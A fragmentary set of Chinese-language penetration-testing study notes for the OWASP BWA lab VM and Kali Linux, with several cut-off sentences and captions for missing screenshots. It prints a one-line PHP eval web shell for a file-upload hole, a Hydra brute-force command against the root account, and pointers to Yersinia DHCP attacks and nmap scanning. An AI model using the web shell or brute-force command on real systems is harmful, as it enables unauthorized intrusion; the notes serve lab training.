参考https://blog.csdn.net/a145127/article/details/84893355

我们很多攻击都会集中在下面这个应用里面 我们利用文件上传漏洞来上传程序文件 无论你上传什么文件都可以 我们上传一段sheel脚本 <?php @eval($_POST['caidao']);?> caidao是密码 然后下载

我们先下载靶机下载地址：https://sourceforge.net/projects/owaspbwa/ 自己直接直接用vmware启动就可以了。。 上面这个就是靶机提供的各种应用了 kali自己安装。。

原视频地址：https://www.youtube.com/watch?v=ZaGUYarouas&list=PLwDQt7s1o9J6vKkkYfcCqBCs0d4gZ3yWB

https://lddp.github.io/2019/09/15/phpMyAdmin%E7%88%86%E7%A0%B4%E7%A5%9E%E5%99%A8/ 软件长下面这个样子：

我们用Hydra来实现命令如下：hydra -l(用户名) root -P(爆破字典) /usr/share/wordlists/passwords.txt(绝对路径，passwords.txt为字典文件名，可以将自己的字典加入到该目录下)

ddos攻击可以参考这个：https://www.zhihu.com/question/22259175 启动方法： yersinia -G 软件长下面这个样子 正常电脑启动会访问DHCP服务器获取ip地址（这个只能攻击路由器） 下一

使用大名鼎鼎的nmap即可实现参考教程：https://wizardforcel.gitbooks.io/kali-linux-cookbook/content/ch4.html 最简单的使用方法:nmap 192.168.56.101 扫